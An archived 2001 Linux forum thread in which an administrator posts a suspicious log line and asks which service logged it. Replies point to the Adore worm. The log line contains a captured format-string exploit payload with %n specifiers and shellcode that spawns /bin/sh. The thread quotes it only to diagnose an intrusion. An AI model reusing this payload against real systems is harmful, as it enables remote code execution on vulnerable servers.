LINUX.ORG.RU

Chto eto?


0

0

V logah proskochila (mnogokratno) takaya vesh:

Jun 25 14:18:28 vskur4 SERVER[14790]: Dispatch_input: bad request line 'BBЬуя?Эуя?Юуя?Яуя?XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n?????????????????????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????????????????????????? ??????????????????????????????????????????????1Ы1Й1А°FН??е1Т?f?Р1Й?ЛC?]шC?]фK?Mь ?MфН?1Й?EфCf?]мfЗEо^O'?Mр?Eм?EшЖEь^P?Р?MфН??РCCН??РCН??Г1Й???РН??РAН?л^X^?u^H1А? F^G?E^L°^K?у?M^H?U^LН?игяяя/bin/sh'

Chto bi eto moglo bit'? Pohoje na buffer overflow attack (viglyadit kak ispolnaemii' kod, zaranee podobrannoi' dlini - s ? v seredine i vizovom /bin/sh v konce), tol'ko k kakomu servisu? Chto za process SERVER - ne znaiu, nomer processa kajdii' raz novii', odnoznachno ne httpd i sendmail - na etoi' mashine ih prosto net; mashini RH7.0, zapusheni nfsd,sshd,ntpd,atd. Kak ponyat' - kakoi- servis eto pishet?

anonymous

Prover` est` li u tebja 
/sbin/kfm
i prover` maillog na predmet pisem ot ruta(root) v kitai (china.com)

Esli najdesh - eto novyj adore worm
 

Jaberwock ★★★
()

Net. V smisle kfm net (KDE mi ne pol'zuem). I s kitaem perepiski toje ne bilo. Kakie budut eshe pred(po)lojeniya?

anonymous
()
17 августа 2001 г.

У меня было аналогично, когда просто электрики 220 вырубили :)

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.